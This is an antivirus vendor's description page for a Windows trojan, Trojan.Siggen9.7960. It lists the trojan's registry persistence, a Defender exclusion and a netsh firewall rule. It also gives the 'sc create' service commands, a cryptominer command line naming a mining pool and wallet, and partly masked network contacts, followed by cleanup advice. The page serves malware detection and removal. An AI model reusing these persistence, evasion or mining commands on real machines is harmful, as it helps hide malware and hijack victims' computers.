Защити созданное

Другие наши ресурсы

  • free.drweb.kz — бесплатные утилиты, плагины, информеры
  • av-desk.com — интернет-сервис для поставщиков услуг Dr.Web AV-Desk
  • curenet.drweb.kz — сетевая лечащая утилита Dr.Web CureNet!

Библиотека
Моя библиотека

Чтобы добавить ресурс в библиотеку, войдите в аккаунт.

Добавить в библиотеку

Ресурсов: -

Последний: -

Моя библиотека

Поддержка
Круглосуточная поддержка | Правила обращения

Позвоните

Глобальная поддержка:
+7 (495) 789-45-86

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Глобальная поддержка:
+7 (495) 789-45-86

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen9.7960

Добавлен в вирусную базу Dr.Web: 2020-02-02

Описание добавлено:

Technical Information

To ensure autorun and distribution
Creates the following services
  • [<HKLM>\System\CurrentControlSet\Services\lamlllme] 'Start' = '00000002'
  • [<HKLM>\System\CurrentControlSet\Services\lamlllme] 'ImagePath' = '%WINDIR%\SysWOW64\lamlllme\wnvtdyft.exe /d"<Full path to file>"'
  • [<HKLM>\SYSTEM\CurrentControlSet\services\lamlllme] 'ImagePath' = '%WINDIR%\SysWOW64\lamlllme\wnvtdyft.exe'
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
  • [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\lamlllme' = '00000000'
Executes the following
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Injects code into
the following system processes:
  • %WINDIR%\syswow64\svchost.exe
Modifies file system
Creates the following files
  • %TEMP%\wnvtdyft.exe
  • %WINDIR%\syswow64\config\systemprofile:.repos
Moves the following files
  • from %TEMP%\wnvtdyft.exe to %WINDIR%\syswow64\lamlllme\wnvtdyft.exe
Deletes itself.
Network activity
TCP
HTTP GET requests
  • http://www.google.com/
  • '46.#8.66.2':420
  • '21#.#39.34.21':443
  • 'sm##.tin.it':25
  • 'hw#.co.uk':25
  • 'sm####.laposte.net':25
  • 'ma####an.nebula.fi':25
  • 'mx#.#aver.com':25
  • 'mx#.##aroutes.com':25
  • 'kr######x1.worksmobile.com':25
  • 'al######x-vip2.prodigy.net':25
  • 'mx####.concentric.com':25
  • '93.##9.69.109':420
  • '43.#31.4.7':443
  • 'an####am.korea.kr':25
  • 'a.##.##erkraft.com.br':25
  • 'ka##car.net':25
  • 'ma##.####iotherapie-roehl.de':25
  • 'mx.###zta.onet.pl':25
  • 'fo###.#irtualhosting.hk':25
  • 'ma##.#enko.com.sg':25
  • 'ig#.apc.org':25
  • 'mx###.##il.am0.yahoodns.net':25
  • 'mt#.bnet.cn':25
  • 'co####.gefico.com':25
  • 'ma##.uralweb.ru':25
  • 'mx###.##llcanadahosting.com':25
  • 'na#.###.#rotection.outlook.com':25
  • 'mx##.012.net.il':25
  • '17#.#.114.177':420
  • '46.#.52.109':420
  • 'ho#########.olc.protection.outlook.com':25
  • 'mx#.###udhosting.co.uk':25
  • 'mi####.bittubeapp.com':13333
  • 'mx#.#ypnosys.de':25
  • 'gmail-smtp-in.l.google.com':25
  • 'sm####n.eutelia.it':25
  • 'pu######2.mail2world.com':25
  • 'pa####x.above.com':25
  • 'mx#.#anmail.net':25
  • 'ms#####p-mx2.hinet.net':25
  • 'ma###.##mebrightmail.com':25
  • 'mx####.##il.gm0.yahoodns.net':25
  • '85.##4.134.88':484
  • 'mx.####ramwireless.com':25
  • 'ASPMX.L.GOOGLE.com':25
  • 'mx#.##martcloud.com':25
  • 'ma##.#mumford.com':25
  • 'ma##.###abulutplastik.com':25
  • 'mx##.#andomain.dk':25
  • 'mx.##.#tinternet.com':25
  • 'ma##.itline.it':25
  • 'ma##.###abulutsigorta.com':25
  • 'mx#.##rthlink.net':25
  • 'ALT1.ASPMX.L.GOOGLE.COM':25
  • '18#.#65.238.150':420
  • '78.#1.67.23':420
  • 'ms#####p-mx1.hinet.net':25
  • 'mt##.##0.yahoodns.net':25
  • 'ma###.iki.fi':25
  • UDP
    • DNS ASK mi##########m.mail.protection.outlook.com
    • DNS ASK mx.##.##mail.iss.as9143.net
    • DNS ASK hw##horn.de
    • DNS ASK na##r.com
    • DNS ASK mx#.#aver.com
    • DNS ASK hw##f.com
    • DNS ASK mx#.##aroutes.com
    • DNS ASK tr#####eldworley.co.nz
    • DNS ASK ti##ali.it
    • DNS ASK mx#######301.gslb.pphosted.com
    • DNS ASK a1.net
    • DNS ASK mx##.aon.at
    • DNS ASK ch##ter.net
    • DNS ASK mx#.#harter.net
    • DNS ASK ko#.net
    • DNS ASK bu###abs.com
    • DNS ASK kr######x1.worksmobile.com
    • DNS ASK mx#.gmx.com
    • DNS ASK nt###rld.com
    • DNS ASK gr###iti.net
    • DNS ASK al######x-vip2.prodigy.net
    • DNS ASK be###outh.net
    • DNS ASK hw#.co.uk
    • DNS ASK ke###.com.sg
    • DNS ASK ma##.#enko.com.sg
    • DNS ASK 01#.net.il
    • DNS ASK mx##.012.net.il
    • DNS ASK google.com
    • DNS ASK hw#.fi
    • DNS ASK da##m.net
    • DNS ASK ha##i.co.nz
    • DNS ASK ma####an.nebula.fi
    • DNS ASK ti#.it
    • DNS ASK sm##.tin.it
    • DNS ASK pe###epc.com
    • DNS ASK vi##ilio.it
    • DNS ASK sm####n.virgilio.it
    • DNS ASK xt##.co.nz
    • DNS ASK mx.##ra.co.nz
    • DNS ASK sm####.laposte.net
    • DNS ASK ea###link.net
    • DNS ASK mt##.org
    • DNS ASK mx.#tia.org
    • DNS ASK hw####sulting.com
    • DNS ASK ya##o.co.uk
    • DNS ASK mx###.##il.am0.yahoodns.net
    • DNS ASK ge##co.com
    • DNS ASK co####.gefico.com
    • DNS ASK ur##web.ru
    • DNS ASK ma##.uralweb.ru
    • DNS ASK ya###.com.ar
    • DNS ASK mt##.##0.yahoodns.net
    • DNS ASK ju##.com
    • DNS ASK la##ste.net
    • DNS ASK mx.##a.untd.com
    • DNS ASK hv####oring.co.uk
    • DNS ASK ik#.fi
    • DNS ASK ma###.iki.fi
    • DNS ASK vi###water.gr
    • DNS ASK mx#.#tenet.gr
    • DNS ASK ne###ape.net
    • DNS ASK an###ankoski.fi
    • DNS ASK mt#.bnet.cn
    • DNS ASK ib###atyna.com
    • DNS ASK pu#.##.jsinfo.net
    • DNS ASK fo###.#irtualhosting.hk
    • DNS ASK mx####.concentric.com
    • DNS ASK ko##a.net
    • DNS ASK an####am.korea.kr
    • DNS ASK mu###ystools.ca
    • DNS ASK mx###.##llcanadahosting.com
    • DNS ASK ib####aft.com.br
    • DNS ASK a.##.##erkraft.com.br
    • DNS ASK ni###.com.hk
    • DNS ASK sa###pintex.com
    • DNS ASK fi####orizon.com
    • DNS ASK hw##un.net
    • DNS ASK ph#####herapie-roehl.de
    • DNS ASK ma##.####iotherapie-roehl.de
    • DNS ASK po###a.onet.pl
    • DNS ASK mx.###zta.onet.pl
    • DNS ASK t-##line.de
    • DNS ASK mx##.#-online.de
    • DNS ASK ig#.apc.org
    • DNS ASK ma#######.firsttennessee.com
    • DNS ASK va########enkiinteistopalvelu.fi
    • DNS ASK mx#.##rthlink.net
    • DNS ASK si##n.dk
    • DNS ASK pr###gy.net.mx
    • DNS ASK pu######2.mail2world.com
    • DNS ASK do##il.net
    • DNS ASK pa####x.above.com
    • DNS ASK vs##.com
    • DNS ASK mx#######c01.gslb.pphosted.com
    • DNS ASK we##v.net
    • DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
    • DNS ASK na#.###.#rotection.outlook.com
    • DNS ASK ms#####p-mx2.hinet.net
    • DNS ASK lg#.com
    • DNS ASK lg###tp.lge.com
    • DNS ASK na##.com
    • DNS ASK mx#.#ate.com
    • DNS ASK ha##ail.net
    • DNS ASK mx#.#anmail.net
    • DNS ASK fr###omland.it
    • DNS ASK sm####n.eutelia.it
    • DNS ASK mx#.#ypnosys.de
    • DNS ASK hy##osys.de
    • DNS ASK cx#.##.#.cloudfilter.net
    • DNS ASK ho##ail.com
    • DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
    • DNS ASK ho#########.olc.protection.outlook.com
    • DNS ASK hy######rapy-for-life.co.uk
    • DNS ASK 19#.###.#11.95.bl.spamcop.net
    • DNS ASK 19#.###.#11.95.zen.spamhaus.org
    • DNS ASK mx#.###udhosting.co.uk
    • DNS ASK go###ople.com
    • DNS ASK ms#.#inet.net
    • DNS ASK ti###linet.it
    • DNS ASK mi####.bittubeapp.com
    • DNS ASK 19#.###.#11.95.cbl.abuseat.org
    • DNS ASK ly##s.com
    • DNS ASK mx.#####.#om.cust.b.hostedemail.com
    • DNS ASK gm##l.com
    • DNS ASK gmail-smtp-in.l.google.com
    • DNS ASK co#.net
    • DNS ASK 19#.###.211.95.in-addr.arpa
    • DNS ASK et###.#ail.tiscali.it
    • DNS ASK it##ne.it
    • DNS ASK ma##.itline.it
    • DNS ASK ch###mfm.com
    • DNS ASK mx##.mail.com
    • DNS ASK te###quebec.com
    • DNS ASK do####.nssi.telus.com
    • DNS ASK do#####andomizer.com
    • DNS ASK gm#.net
    • DNS ASK mx##.#mig.gmx.net
    • DNS ASK ka#####utplastik.com
    • DNS ASK ma##.###abulutplastik.com
    • DNS ASK mx##.#andomain.dk
    • DNS ASK ev#.net
    • DNS ASK bt###ernet.com
    • DNS ASK mx.##.#tinternet.com
    • DNS ASK ih#.org.nz
    • DNS ASK mx#.##curemx.biz
    • DNS ASK ka#####utsigorta.com
    • DNS ASK ma##.###abulutsigorta.com
    • DNS ASK ka##car.net
    • DNS ASK tr##enet.it
    • DNS ASK ma##.com
    • DNS ASK ms##.hinet.net
    • DNS ASK mx#.##martcloud.com
    • DNS ASK sm##.##cureserver.net
    • DNS ASK da##.net
    • DNS ASK co##ast.net
    • DNS ASK mx#.#omcast.net
    • DNS ASK dm##.com
    • DNS ASK ma###.##mebrightmail.com
    • DNS ASK ao#.com
    • DNS ASK mx####.##il.gm0.yahoodns.net
    • DNS ASK dc##0.com
    • DNS ASK ALT1.ASPMX.L.GOOGLE.COM
    • DNS ASK ASPMX.L.GOOGLE.com
    • DNS ASK ms#####p-mx1.hinet.net
    • DNS ASK ez###tech.com
    • DNS ASK mx.####ramwireless.com
    • DNS ASK fl###tline.com
    • DNS ASK mo######l.flightline.com
    • DNS ASK dm###ord.com
    • DNS ASK ma##.#mumford.com
    • DNS ASK ib##nc.com
    • DNS ASK do###rrae.co.uk
    • DNS ASK rh#.fi
    Miscellaneous
    Creates and executes the following
    • '%WINDIR%\syswow64\lamlllme\wnvtdyft.exe' /d"<Full path to file>"
    • '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\lamlllme\' (with hidden window)
    • '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\wnvtdyft.exe" %WINDIR%\SysWOW64\lamlllme\' (with hidden window)
    • '%WINDIR%\syswow64\sc.exe' create lamlllme binPath= "%WINDIR%\SysWOW64\lamlllme\wnvtdyft.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
    • '%WINDIR%\syswow64\sc.exe' description lamlllme "wifi internet conection"' (with hidden window)
    • '%WINDIR%\syswow64\sc.exe' start lamlllme' (with hidden window)
    • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
    Executes the following
    • '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\lamlllme\
    • '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\wnvtdyft.exe" %WINDIR%\SysWOW64\lamlllme\
    • '%WINDIR%\syswow64\sc.exe' create lamlllme binPath= "%WINDIR%\SysWOW64\lamlllme\wnvtdyft.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
    • '%WINDIR%\syswow64\sc.exe' description lamlllme "wifi internet conection"
    • '%WINDIR%\syswow64\sc.exe' start lamlllme
    • '%WINDIR%\syswow64\svchost.exe'
    • '%WINDIR%\syswow64\svchost.exe' --algo=cn-heavy/tube -o mining.bittubeapp.com:13333 -u bs4msiPiHNGTd5uzvZ9AGM1tjQoTiEX9BXopJg5er3ebEQ8a8mcwkjP5jNwst8rmVSRuogLs18DAVQzV76oHkVBk27idvmtUp.60000 -p x -k

    Рекомендации по лечению

    1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
    2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
    Скачать Dr.Web

    По серийному номеру

    Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

    На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

    Скачать Dr.Web

    По серийному номеру

    1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
    2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
      • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
      • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
      • выключите устройство и включите его в обычном режиме.

    Подробнее о Dr.Web для Android

    Демо бесплатно на 14 дней

    Выдаётся при установке